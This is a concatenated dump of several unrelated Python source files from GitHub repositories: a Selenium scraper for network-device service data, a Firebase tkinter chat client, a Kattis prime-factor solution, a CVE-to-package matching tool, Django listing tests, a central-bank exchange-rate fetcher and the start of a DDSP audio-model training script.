[]\r\n flowPointQueue = Queue()\r\n unReachableIpQueue = Queue()\r\n #utilObj = UtilityClass()\r\n PWD_6200 = \"ADMIN\"\r\n USER_6200 = \"ADMIN\"\r\n THREAD_POOL_SIZE = 5\r\n GECKODRIVER_PATH=\"C:\\\\Users\\\\Ariz Ansari\\\\Documents\\\\QOS\\\\geckodriver\\\\geckodriver.exe\" #\"C:\\\\Users\\\\Vineet\\\\Downloads\\\\geckodriver-v0.21.0-win32\\\\geckodriver.exe\"\r\n sep = os.sep\r\n PROJECT_PATH = \"..\"\r\n REPORTS_COMMON_PATH = os.path.join(PROJECT_PATH, \"Reports\" + sep)\r\n\r\n def __init__(self):\r\n self.date = datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S-%f')[:-3]\r\n self.flowPointQueue.put([\"IP\",\"NeType\", \"Service Name\",\"Service Type\", \"Flow Point\", \"EVS\", \"Interface\", \"FlowPointTemplate\"])\r\n\r\n def getFirefoxDriver(self):\r\n capabilities = webdriver.DesiredCapabilities().FIREFOX\r\n capabilities[\"marionette\"] = True\r\n binary = FirefoxBinary('C:/Program Files/Mozilla Firefox/firefox.exe')\r\n driver = webdriver.Firefox(firefox_binary=binary, capabilities=capabilities,executable_path=self.GECKODRIVER_PATH)#\"C:/Utility/BrowserDrivers/geckodriver.exe\")\r\n return driver\r\n\r\n def getChromeDriver(self):\r\n driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)\r\n return driver\r\n\r\n def 
logout(self, driver):\r\n driver.switch_to_default_content()\r\n driver.switch_to_frame(driver.find_element_by_name(\"commonHeader\"))\r\n driver.find_element_by_link_text(\"LOGOUT\").click()\r\n\r\n def fetchData(self):\r\n isPythonVersion3 = True\r\n if sys.version_info[0] < 3:\r\n isPythonVersion3 = False\r\n\r\n if isPythonVersion3:\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=self.THREAD_POOL_SIZE) as executor:\r\n for poolList in self.serverConfig:\r\n for poolItem in poolList:\r\n executor.submit(self.executeWorker, poolItem)\r\n print(\"Queue size: \", self.flowPointQueue.qsize())\r\n\r\n else:\r\n for poolList in self.serverConfig:\r\n # executor.submit(self.executeWorker, serverConf)\r\n print('Starting new pool : ' + str(self.THREAD_POOL_SIZE))\r\n threadPoolList = []\r\n for poolItem in poolList:\r\n t = threading.Thread(target=self.executeWorker, args=(poolItem,))\r\n t.start()\r\n threadPoolList.append(t)\r\n for t in threadPoolList:\r\n t.join()\r\n print('pool Ends')\r\n # self.writeDataToFile(os.path.join(self.REPORTS_COMMON_PATH,\"TDMServices\" +self.sep + \"TDMServicesReport\"), self.flowPointQueue)\r\n\r\n def executeWorker(self, serverConf):\r\n if '6200' in serverConf[3]:\r\n self.executeWorker6200(serverConf)\r\n elif serverConf[3] in ['3930', '5160']:\r\n self.executeWorkerOthers(serverConf)\r\n\r\n def executeWorker6200(self, serverConf):\r\n ip = serverConf[0]\r\n driver = self.getFirefoxDriver()\r\n try:\r\n driver.implicitly_wait(self.implicitWait)\r\n loginUrl = \"http://\" + ip + \":20080/EMSRequest/Welcome\"\r\n print(loginUrl)\r\n driver.get(loginUrl)\r\n search_field = driver.find_element_by_name(\"Username\")\r\n search_field.send_keys(serverConf[1])\r\n\r\n search_field = driver.find_element_by_name(\"Password\")\r\n search_field.send_keys(serverConf[2])\r\n submitButton = driver.find_element_by_name(\"Submit\")\r\n submitButton.click()\r\n time.sleep(self.sleepInterval)\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeTocFrame\"))\r\n time.sleep(self.sleepInterval)\r\n driver.find_element_by_link_text(\"L2 Services\").click()\r\n time.sleep(self.sleepInterval)\r\n driver.find_element_by_link_text(\"Service Switch-1\").click()\r\n time.sleep(self.sleepInterval)\r\n driver.find_element_by_link_text(\"Services Provisioning\").click()\r\n time.sleep(self.sleepInterval)\r\n self.tdmElineService(driver, serverConf)\r\n time.sleep(self.sleepInterval)\r\n self.tdmElanService(driver, serverConf)\r\n except Exception as e:\r\n print(\"Exception occurred!!!! 
\\n\",str(e))\r\n itemList = []\r\n itemList.append(ip)\r\n self.unReachableIpQueue.put(itemList)\r\n print(\"Writing to csv\")\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"unReachableIp\"),\r\n self.unReachableIpQueue)\r\n finally:\r\n try:\r\n self.logout(driver)\r\n except:\r\n itemList = []\r\n itemList.append(ip)\r\n self.unReachableIpQueue.put(itemList)\r\n print(\"Writing to csv\")\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"unReachableIp\"), self.unReachableIpQueue)\r\n finally:\r\n time.sleep(self.sleepInterval)\r\n driver.close()\r\n\r\n\r\n def tdmElineService(self, driver, serverConf):\r\n driver.find_element_by_link_text(\"ELINE Services\").click()\r\n time.sleep(self.sleepInterval)\r\n serviceType=\"ELINE\"\r\n driver.switch_to_default_content()\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeBodyFrame\"))\r\n time.sleep(1)\r\n count=0\r\n # rows = driver.find_elements_by_tag_name(\"tr\")\r\n rows = driver.find_elements_by_xpath(\"//table[2]/tbody/tr\")\r\n print(\"Rows found: \", len(rows), \"\\n\", rows)\r\n for row in range(1,len(rows)):\r\n count += 1\r\n serviceName=driver.find_element_by_xpath(\"//html/body/form/table[2]/tbody/tr[\"+str(count+1)+\"]/td[1]\").text#get_attribute(\"text\")\r\n print(\"Value : \", serviceName)\r\n driver.find_element_by_xpath(\"//html/body/form/table[2]/tbody/tr[\" + str(count + 1) + \"]/td[1]\").click()\r\n fprows = driver.find_elements_by_xpath(\"//table[2]/tbody/tr\")\r\n fpcount = 0\r\n print(\"FPRows found: \", len(fprows), \"\\n\", fprows)\r\n # if len(fprows) == 2:\r\n # print(\"No Flow points found\")\r\n # continue\r\n for fp in range(1, len(fprows)):\r\n fpcount += 1\r\n fpName = driver.find_element_by_xpath(\r\n \"//html/body/form/table[2]/tbody/tr[\" + str(fpcount + 1) + \"]/th/a\").text\r\n time.sleep(self.sleepInterval)\r\n print(\"FP name: \",fpName)\r\n # driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(fpcount + 1) + \"]/th/a\").click()\r\n # /html/body/form/table[2]/tbody/tr[2]/th/a\r\n fpDvr = driver.find_element_by_xpath(\"//html/body/form/table[2]/tbody/tr[\" + str(fpcount + 1) + \"]/th/a\")\r\n fpDvr.click()\r\n time.sleep(self.sleepInterval)\r\n temprows = driver.find_elements_by_tag_name(\"tr\")\r\n tempcount = 0\r\n print(\"TempRows found: \", len(temprows), \"\\n\", temprows)\r\n fpDict = {\"EVC\": \"None\", \"Interface\": \"None\", \"FlowPointTemplate\": \"None\"}\r\n fpList = list(fpDict.keys())\r\n for temp in range(len(temprows) ):\r\n\r\n property = driver.find_element_by_xpath(\r\n \"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/th\").text\r\n value = driver.find_element_by_xpath(\r\n \"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/td\").text\r\n tempcount += 1\r\n # print(\"FP name: \", property, value)\r\n if property.strip() in fpList and len(fpList) != 0:\r\n # valueList.append(value)\r\n fpDict[property] = value\r\n fpList.remove(property.strip())\r\n if len(fpList) == 0 or temp == len(temprows)-3:\r\n driver.find_element_by_partial_link_text(\"Back to \").click()\r\n print(\"Clicked on Back To\")\r\n time.sleep(self.sleepInterval)\r\n break\r\n print([serverConf[0], serverConf[3], serviceName, serviceType, fpName] + [fpDict[\"EVC\"]] + [\r\n fpDict[\"Interface\"]] + [fpDict[\"FlowPointTemplate\"]])\r\n self.flowPointQueue.put(\r\n [serverConf[0], serverConf[3], serviceName, serviceType, fpName] + [fpDict[\"EVC\"]] + [\r\n fpDict[\"Interface\"]] + 
[fpDict[\"FlowPointTemplate\"]])\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"TDMServicesReport\"),\r\n self.flowPointQueue)\r\n # print(\"FPROWS: \",len(fprows), \"FP: \", fp)\r\n if len(fprows)-1 == fp:\r\n driver.find_element_by_partial_link_text(\"View Data\").click()\r\n print(\"Clicked on View Data\")\r\n time.sleep(self.sleepInterval)\r\n break\r\n driver.switch_to_default_content()\r\n time.sleep(self.sleepInterval)\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeTocFrame\"))\r\n time.sleep(self.sleepInterval)\r\n\r\n def tdmElanService(self, driver, serverConf):\r\n driver.find_element_by_link_text(\"ELAN Services\").click()\r\n time.sleep(self.sleepInterval)\r\n serviceType = \"ELAN\"\r\n print(\"Service Type:\", serviceType)\r\n driver.switch_to_default_content()\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeBodyFrame\"))\r\n time.sleep(1)\r\n count = 0\r\n # /html/body/form/table[2]/tbody/tr[2]/td[1]/p/a\r\n rows = driver.find_elements_by_xpath(\"//table[2]/tbody/tr\")\r\n print(\"Rows found: \", len(rows), \"\\n\")#, rows)\r\n for row in range(1, len(rows)):\r\n count += 1\r\n serviceName = driver.find_element_by_xpath(\r\n \"//html/body/form/table/tbody/tr[\" + str(count + 1) + \"]/td/p/a/b\").text # get_attribute(\"text\")\r\n print(\"Service Name : \", serviceName)\r\n # driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(count + 1) + \"]/td/p/a\").click()\r\n driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(count + 1) + \"]/td/p/a\").click()\r\n fprows = driver.find_elements_by_xpath(\"//table[3]/tbody/tr\")\r\n time.sleep(self.sleepInterval)\r\n print(\"FPRows found: \", len(fprows), \"\\n\", fprows)\r\n\r\n fpcount = 0\r\n #, fprows)\r\n for fp in range(1, len(fprows)):\r\n fpcount += 1\r\n print(\"In FProws\")\r\n fpName = driver.find_element_by_xpath(\r\n \"//html/body/form/table[3]/tbody/tr[\" + str(fp + 2) + \"]/td/p\").text\r\n print(\"FP name: \", fpName)\r\n fpDvr= driver.find_element_by_xpath(\"//html/body/form/table[3]/tbody/tr[\" + str(fp + 2) + \"]/td/p/a\")\r\n fpDvr.click()\r\n\r\n print(\"Finding temp rows: \")\r\n temprows = driver.find_elements_by_tag_name(\"tr\")\r\n tempcount = 0\r\n print(\"TempRows found: \", len(temprows), \"\\n\", temprows)\r\n fpDict = {\"EVC\": \"None\", \"Interface\": \"None\", \"FlowPointTemplate\":\"None\"}\r\n fpList = list(fpDict.keys())\r\n valueList=[]\r\n for temp in range(len(temprows) - 1):\r\n if len(fpList) == 0 or temp == len(temprows)-3:\r\n driver.find_element_by_partial_link_text(\"Back to \").click()\r\n time.sleep(self.sleepInterval)\r\n break\r\n property = driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/th\").text\r\n value = driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/td\").text\r\n tempcount += 1\r\n # print(\"FP name: \", property, value)\r\n if property.strip() in fpList and len(fpList) != 0:\r\n # valueList.append(value)\r\n fpDict[property]=value\r\n fpList.remove(property.strip())\r\n print([serverConf[0], serverConf[3], serviceName, serviceType, fpName]+[fpDict[\"EVC\"]]+[fpDict[\"Interface\"]]+[fpDict[\"FlowPointTemplate\"]])\r\n self.flowPointQueue.put(\r\n [serverConf[0], serverConf[3], serviceName, serviceType, fpName]+[fpDict[\"EVC\"]]+[fpDict[\"Interface\"]]+[fpDict[\"FlowPointTemplate\"]])\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + 
\"TDMServicesReport\"),\r\n self.flowPointQueue)\r\n if len(fprows)-2 == fp:\r\n driver.find_element_by_partial_link_text(\"View Data\").click()\r\n time.sleep(self.sleepInterval)\r\n break\r\n\r\n def executeWorkerOthers(self, serverConf):\r\n pass\r\n\r\n def writeDataToFile(self, fileName, que):\r\n print(\"Writing to file\")\r\n directory = os.path.dirname(fileName)\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n fd = open(fileName + '_' + self.date + '.csv', 'a')\r\n while not que.empty():\r\n d = que.get()\r\n fd.write((',').join(d) + '\\n')\r\n\r\n def readConfig(self, filePath=None, isApi=False):\r\n '''\r\n This method reads the config file and loads data in to python objects\r\n '''\r\n serverConfig=[]\r\n if filePath != None:\r\n self.confFile = filePath\r\n fd=open(self.confFile,'r')\r\n eof = False\r\n while True:\r\n poolList=[]\r\n for i in range(self.THREAD_POOL_SIZE):\r\n line=fd.readline()\r\n if(line.strip() == \"\"):\r\n eof = True\r\n break\r\n neList=line.split(',')\r\n neDetailsList=[]\r\n neDetailsList.append(neList[0].strip())\r\n if isApi:\r\n neDetailsList.append(USER_MCP)\r\n neDetailsList.append(PWD_MCP)\r\n elif '6200' in neList[1].strip():\r\n neDetailsList.append(self.USER_6200)\r\n neDetailsList.append(self.PWD_6200)\r\n elif neList[1].strip() in ['3930', '5160']:\r\n neDetailsList.append(USER_OTHERS)\r\n neDetailsList.append(PWD_OTHERS)\r\n neDetailsList.append(neList[1].strip())\r\n if len(neList) >= 3:\r\n neDetailsList.append(neList[2].strip())\r\n if len(neList) >= 4:\r\n neDetailsList.append(neList[3].strip())\r\n if len(neList) >= 5:\r\n neDetailsList.append(neList[4].strip())\r\n poolList.append(neDetailsList)\r\n if len(poolList)>0:\r\n serverConfig.append(poolList)\r\n if eof:\r\n break\r\n fd.close()\r\n print(str(serverConfig))\r\n return serverConfig\r\n\r\nprint('Starting TDM Service script')\r\nmyObj = snmpTrap()\r\nstartDate=str(datetime.now())\r\nconfFile = \"Test_6200.txt\"\r\nif len(sys.argv) > 1:\r\n confFile=sys.argv[1]\r\nmyObj.serverConfig=myObj.readConfig(confFile)\r\nmyObj.fetchData()\r\neDate=str(datetime.now())\r\nprint (\"start\",startDate)\r\nprint (\"end:\" , eDate)\r\nprint('Ending TDM Service script')\r\n","repo_name":"ArizAnsari1994/Data-Extration-Automation","sub_path":"TDMService.py","file_name":"TDMService.py","file_ext":"py","file_size_in_byte":16345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"32669849923","text":"# Fråga tills imon\n# Vad kommer finnas på tentan? 
\n\n\nimport tkinter as tk\nimport tkinter.messagebox as tkmsgbox\nimport tkinter.scrolledtext as tksctxt\n\nimport firebase_admin\nfrom firebase_admin import db\n\nimport json\n\nclass Application(tk.Frame):\n    def __init__(self, master=None):\n        super().__init__(master)\n        self.pack()\n        self.create_widgets()\n\n\n    def create_widgets(self):\n\n        #-------------------------------------------------------------------\n        # row 1: connection stuff (and a clear-messages button)\n        #-------------------------------------------------------------------\n        self.groupName = tk.LabelFrame(bd=0)\n        self.groupName.pack(side=\"top\")\n\n        self.nameLbl = tk.Label(self.groupName, text=\"Name\", padx=10)\n        self.nameLbl.pack(side=\"left\")\n\n        self.nameIn = tk.Entry(self.groupName, width=20)\n        self.nameIn.pack(side=\"left\")\n\n        #-------------------------------------------------------------------\n        # row 2: the message field (chat messages + status messages)\n        #-------------------------------------------------------------------\n        self.msgText = tksctxt.ScrolledText(height=15, width=42,\n                                            state=tk.DISABLED)\n        self.msgText.pack(side=\"top\")\n\n\n        #-------------------------------------------------------------------\n        # row 3: sending messages\n        #-------------------------------------------------------------------\n        self.groupSend = tk.LabelFrame(bd=0)\n        self.groupSend.pack(side=\"top\")\n        #\n        self.textInLbl = tk.Label(self.groupSend, text='message', padx=10)\n        self.textInLbl.pack(side=\"left\")\n        #\n        self.textIn = tk.Entry(self.groupSend, width=38)\n        # if the focus is on this text field and you hit 'Enter',\n        # it should (try to) send\n        self.textIn.bind('<Return>', sendMessage)\n        self.textIn.pack(side=\"left\")\n        #\n        padder = tk.Label(self.groupSend, padx=5)\n        padder.pack(side=\"left\")\n        #\n        self.sendButton = tk.Button(self.groupSend, text = 'send',\n                                    command = sendButtonClick)\n        self.sendButton.pack(side=\"left\")\n\ndef sendButtonClick():\n    # forward to the sendMessage method\n    sendMessage(g_app)\n\n# a utility method to print to the message field\ndef printToMessages(message):\n    g_app.msgText.configure(state=tk.NORMAL)\n    g_app.msgText.insert(tk.END, message + '\\n')\n    # scroll to the end, so the new message is visible at the bottom\n    g_app.msgText.see(tk.END)\n    g_app.msgText.configure(state=tk.DISABLED)\n\n# an attempt to close the window is handled here\ndef on_closing():\n    if tkmsgbox.askokcancel(\"Quit\",\n                          \"You are still connected. 
If you quit you will be\"\n + \" disconnected.\"):\n g_root.destroy()\n\n# attempt to send the message (in the text field g_app.textIn) to the server\ndef sendMessage(master):\n message = g_app.textIn.get()\n user = g_app.nameIn.get()\n \n global ref\n newMessage = { 'text' : message, 'user' : user}\n ref.child('messages').push(newMessage)\n\n\ndef handleMessage(message):\n printToMessages(f\"{message['user']} : {message['text']}\")\n \n\ndef streamHandler(incomingData):\n if incomingData.event_type == 'put':\n if incomingData.path == '/':\n # This is the very first reading just after subscription:\n # we get all messages or None (if no messages exists).\n if incomingData.data != None:\n for key in incomingData.data:\n message = incomingData.data[key]\n handleMessage(message)\n else:\n # Not the first reading.\n # Someone wrote a new message that we just got.\n message = incomingData.data\n handleMessage(message)\n\ndatabaseURL = \"https://lab12-accd6-default-rtdb.europe-west1.firebasedatabase.app/\"\n\ncred = firebase_admin.credentials.Certificate(\"lab12.json\")\nfirebase_admin.initialize_app(cred, {\"databaseURL\": databaseURL})\nref = firebase_admin.db.reference(\"/\")\n\nnewMessage = {'name' : 'Mikael', 'text' : \"Hello again on december 7th, wow.\"}\n\ng_listenToFirebaseStream = True\n\ng_root = tk.Tk()\ng_app = Application(g_root)\n\n# Start listen to stream\nref.child('messages').listen(streamHandler)\n\n# if attempt to close the window, handle it in the on-closing method\ng_root.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n# start the main loop\n# (which handles the gui and will frequently call pollMessages)\ng_app.mainloop()\n","repo_name":"sifudiep/netproglabs","sub_path":"lab12/lab12.py","file_name":"lab12.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21338711810","text":"from collections import defaultdict as dd\n\ndef primes(x):\n N = int(X ** 0.5) + 10\n sieve = [True] * N\n sieve[0] = False\n sieve[1] = False\n for i in range(2, N):\n for j in range(i * i, N,i):\n sieve[j] = False \n cnt = 0\n left = x\n for i in range(2, min(N, x)):\n if sieve[i]:\n c = i\n while x % c == 0:\n cnt += 1\n left /= i\n c*= i\n if left > 1:\n cnt += 1\n return max(cnt,1)\n\nX= int(raw_input())\nk =primes(X)\n\nprint(k)","repo_name":"majstenmark/kattis","sub_path":"alistgame.py","file_name":"alistgame.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72857814607","text":"\"\"\"Run CVEjob.\"\"\"\n\nimport sys\nfrom decimal import Decimal\nimport multiprocessing\n\nimport nvdlib\nfrom nvdlib.manager import FeedManager\nfrom nvdlib.query_selectors import in_range\n\nfrom cvejob.filters.input import validate_cve\nfrom cvejob.config import Config\nfrom cvejob.identifiers import get_identifier_cls\nfrom cvejob.cpe2pkg import get_pkgfile_path, PackageNameCandidate\nfrom cvejob.selectors.basic import VersionSelector\nfrom cvejob.outputs.victims import VictimsYamlOutput\nfrom cvejob.versions import NVDVersions\nfrom cvejob.utils import parse_date_range\n\nimport logging\n\n\n# logging configuration\nlogging.basicConfig(level=logging.DEBUG,\n handlers=[nvdlib.get_logging_handler()]) # use nvdlib's handler\n\nlogger = logging.getLogger('cvejob')\n\n\nFEED_NAME_PATTERN = r\"nvdcve-\" \\\n r\"(?P[\\d.]+)-\" \\\n r\"(?P(?P(([A-Za-z]+)))|(?P([\\d]+)))\" \\\n r\".json\"\n\n\ndef 
_log_results(victims_output):\n \"\"\"Log results.\"\"\"\n cve_id = victims_output.cve.id_\n\n logger.info(\n \"[{cve_id}] picked `{winner}` out of `{candidates}`\".format(\n cve_id=cve_id,\n winner=victims_output.winner,\n candidates=victims_output.candidates\n ))\n\n logger.info(\n \"[{cve_id}] Affected version range: {version_ranges}\".format(\n cve_id=cve_id,\n version_ranges=victims_output.affected_versions\n ))\n\n logger.info(\n \"[{cve_id}] Safe version range: {version_ranges}\".format(\n cve_id=cve_id,\n version_ranges=victims_output.safe_versions\n ))\n\n\ndef _filter_collection(collection, date_range, cherry_pick):\n \"\"\"Filter Document collection.\"\"\"\n if date_range:\n collection_size_before = collection.count()\n\n collection = collection.find(\n {'published_date': in_range(*date_range)}\n )\n\n logger.debug((\"Filtered out {} Documents that do not fall \"\n \"in the given range.\").format(\n collection_size_before - collection.count()\n ))\n\n if cherry_pick:\n\n logger.debug(\"Cherry-picked CVE `{cve_id}`\".format(\n cve_id=cherry_pick\n ))\n collection = collection.find(\n {'cve.id_': cherry_pick}\n )\n\n return collection\n\n\ndef run():\n \"\"\"Run CVEjob.\"\"\"\n feed_dir = Config.feed_dir\n feed_names = Config.feed_names\n date_range = Config.date_range\n\n cherrypicked_cve_id = Config.cve_id\n cherrypicked_year = None\n\n if cherrypicked_cve_id:\n cherrypicked_year = cherrypicked_cve_id.split(sep='-')[1]\n\n if int(cherrypicked_year) < 2002:\n # all CVEs prior to 2002 are stored in 2002 feed\n cherrypicked_year = 2002\n\n if date_range:\n date_range = parse_date_range(Config.date_range)\n\n feed_names = range(date_range[0].year, date_range[1].year + 1)\n\n if cherrypicked_cve_id: # optimization check\n\n if int(cherrypicked_year) not in feed_names:\n logger.info(\n \"[{picked_cve_id}] does not belong to the given feed range:\"\n \" {date_range}\".format(\n picked_cve_id=cherrypicked_cve_id,\n date_range=date_range\n ))\n\n return\n\n # prune the feed names as it is not necessary to iterate over all of them\n feed_names = [cherrypicked_year]\n\n if not feed_names:\n\n if cherrypicked_cve_id:\n feed_names = [cherrypicked_year]\n else:\n feed_names = ['modified']\n\n with FeedManager(n_workers=multiprocessing.cpu_count()) as feed_manager:\n\n feeds = feed_manager.fetch_feeds(\n feed_names=feed_names, data_dir=feed_dir, update=True\n )\n collection = feed_manager.collect(feeds)\n collection = _filter_collection(collection,\n date_range,\n cherrypicked_cve_id)\n\n if not collection: # collection is empty\n logger.info(\n \"Collection is empty [{picked_cve_id}].\".format(\n picked_cve_id=cherrypicked_cve_id,\n ))\n\n return\n\n logger.debug(\"Number of CVE Documents in the collection: {}\".format(\n collection.count()\n ))\n\n if Config.package_name and Config.cve_id:\n # user knows the package name, so we don't have to guess ;)\n doc = [x for x in collection][0] # Collection doesn't support indexing\n affected, safe = NVDVersions(doc, Config.package_name, Config.ecosystem).run()\n victims_output = VictimsYamlOutput(\n ecosystem=Config.ecosystem,\n cve_doc=doc,\n winner=PackageNameCandidate(Config.package_name, Decimal('1.0')),\n candidates=[],\n affected=affected,\n fixedin=safe\n )\n _log_results(victims_output)\n victims_output.write()\n sys.exit(0)\n\n for doc in collection:\n\n cve_id = doc.cve.id_\n\n try:\n\n if not validate_cve(doc):\n logger.debug(\n \"[{cve_id}] was filtered out by input checks\".format(\n cve_id=cve_id\n ))\n continue\n\n pkgfile_path = 
get_pkgfile_path(Config.pkgfile_dir, Config.ecosystem)\n            identifier = get_identifier_cls()(doc, Config.ecosystem, pkgfile_path)\n            candidates = identifier.identify()\n\n            if not candidates:\n                logger.info(\n                    \"[{cve_id}] no package name candidates found\".format(\n                        cve_id=cve_id\n                    ))\n                continue\n\n            selector = VersionSelector(doc, candidates, Config.ecosystem)\n            winner = selector.pick_winner()\n\n            if not winner:\n                logger.info(\n                    \"[{cve_id}] no package name found\".format(\n                        cve_id=cve_id\n                    ))\n\n                continue\n\n            affected, safe = NVDVersions(doc, winner.package, Config.ecosystem).run()\n\n            victims_output = VictimsYamlOutput(\n                ecosystem=Config.ecosystem,\n                cve_doc=doc,\n                winner=winner,\n                candidates=candidates,\n                affected=affected,\n                fixedin=safe\n            )\n\n            _log_results(victims_output)\n\n            victims_output.write()\n\n        except Exception as exc:\n\n            logger.warning(\n                \"[{cve_id}] Unexpected exception occurred: {exc}\".format(\n                    cve_id=cve_id,\n                    exc=exc\n                ), exc_info=True)\n\n\nif __name__ == '__main__':\n    run()\n","repo_name":"fabric8-analytics/cvejob","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6782,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"65"} +{"seq_id":"26672693985","text":"import argparse\nimport requests\nimport datetime\nimport xml.etree.ElementTree as ET\n\n\ndef get_currency_rate(code, date):\n    try:\n        input_date = datetime.datetime.strptime(date, '%Y-%m-%d').date()\n\n    except ValueError:\n        print('Please enter a valid date!')\n        return\n\n    if input_date > datetime.date.today():\n        print('Please enter a date no later than today!')\n        return\n\n    url_date = input_date.strftime('%d-%m-%Y')\n    url = f'https://www.cbr.ru/scripts/XML_daily.asp?date_req={url_date}'\n\n    response = requests.get(url)\n\n    if response.status_code != 200:\n        print('Failed to fetch the exchange rates!')\n        return\n\n    xml_data = response.text\n    root = ET.fromstring(xml_data)\n    valute_element = root.find(f'.//Valute[CharCode=\"{code.upper()}\"]')\n\n    if valute_element is None:\n        print(f'Currency with code {code} was not found')\n        return\n\n    value_element = valute_element.find('Value')\n    value = value_element.text\n\n    name_element = valute_element.find('Name')\n    name = name_element.text\n\n    print(f'{code} ({name}): {value}')\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Print the Bank of Russia (CBR) exchange rate for a given date')\n    parser.add_argument('--code', type=str,\n                        help='Currency code in ISO 4217 format')\n    parser.add_argument('--date', type=str, help='Date in YYYY-MM-DD format')\n\n    args = parser.parse_args()\n\n    if args.code is None or args.date is None:\n        parser.print_help()\n    else:\n        get_currency_rate(args.code, args.date)\n","repo_name":"paych3ck/CurrencyRates","sub_path":"console/currency_rates.py","file_name":"currency_rates.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"6975715049","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom app.errors import InvalidTransactionError\nfrom app.models import Item, Listing, Wallet, InventoryItem\n\n\nclass ListingTests(TestCase):\n    def setUp(self):\n        self.item = Item.objects.create(name='sword')\n        self.user = User.objects.create_user(username='ben', password='abc')\n\n    def test_process_purchase_invalid(self):\n        listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.BUY,\n                                         submitter=self.user)\n        with 
self.assertRaises(InvalidTransactionError):\n listing.process_purchase(5)\n\n def test_process_purchase_too_many_items(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.SELL,\n submitter=self.user)\n with self.assertRaises(ValueError):\n listing.process_purchase(10)\n\n def test_process_purchase_updates_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.SELL,\n submitter=self.user)\n listing.process_purchase(1)\n listing.refresh_from_db()\n self.assertEqual(4, listing.count)\n\n def test_process_purchase_deletes_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.SELL,\n submitter=self.user)\n listing.process_purchase(5)\n self.assertEqual(0, Listing.objects.all().count())\n\n\nclass CancelListingTests(TestCase):\n def setUp(self):\n self.item = Item.objects.create(name='sword')\n self.user = User.objects.create_user(username='ben', password='abc')\n\n def test_cancel_buy_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, submitter=self.user,\n direction=Listing.Direction.BUY)\n listing.cancel()\n self.assertEqual(0, Listing.objects.count())\n self.assertEqual(50, Wallet.get_users_wallet(self.user).coins)\n self.assertEqual(0, InventoryItem.objects.count())\n\n def test_cancel_sell_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, submitter=self.user,\n direction=Listing.Direction.SELL)\n listing.cancel()\n self.assertEqual(0, Listing.objects.count())\n self.assertEqual(0, Wallet.get_users_wallet(self.user).coins)\n self.assertEqual(5, InventoryItem.objects.get(user=self.user, item=self.item).count)\n","repo_name":"micossow/auction-house","sub_path":"app/tests/test_listing.py","file_name":"test_listing.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"2336325783","text":"from concurrent.futures import process\nfrom pathlib import Path\nimport os\nimport os\nimport glob\nimport gin\n\nimport numpy as np\nimport tensorflow as tf\nimport subprocess\nfrom ddsp.training.data_preparation.prepare_tfrecord_lib import prepare_tfrecord\nfrom ddsp.colab import colab_utils\nfrom ddsp.colab.colab_utils import play, specplot\n\nfrom matplotlib import pyplot as plt\n\n# Check for project path\nPROJECT_PATH = Path('.').resolve()\nprint(\"PROJECT_PATH:\", PROJECT_PATH)\n\nif not PROJECT_PATH.exists():\n raise Exception(f'Project path {PROJECT_PATH} does not exist')\n\n# Check if separated data exists\nTRAINING_DATASET_PATH = f\"{str(PROJECT_PATH)}/training_data\"\nif not Path(TRAINING_DATASET_PATH).exists():\n raise Exception(\n f\"Training dataset path not found at '{TRAINING_DATASET_PATH}'\")\n\n# Check for checkpoints path\nCHECKPOINTS_PATH = f\"{str(PROJECT_PATH)}/checkpoints\"\nif not Path(CHECKPOINTS_PATH).exists():\n os.mkdir(CHECKPOINTS_PATH)\n assert Path(CHECKPOINTS_PATH).exists()\n\n# Check for gins path\nGINS_PATH = f\"{str(PROJECT_PATH)}/gins\"\nif not Path(GINS_PATH).exists():\n raise Exception(f\"Gins path not found at '{GINS_PATH}'\")\n\n# Environment variables:\nSAMPLE_RATE = 16000\nFRAME_RATE = 250\n\n\ndef train(relative_path, gin_file=\"singing_default.gin\", save_tag=None):\n dataset_pattern = 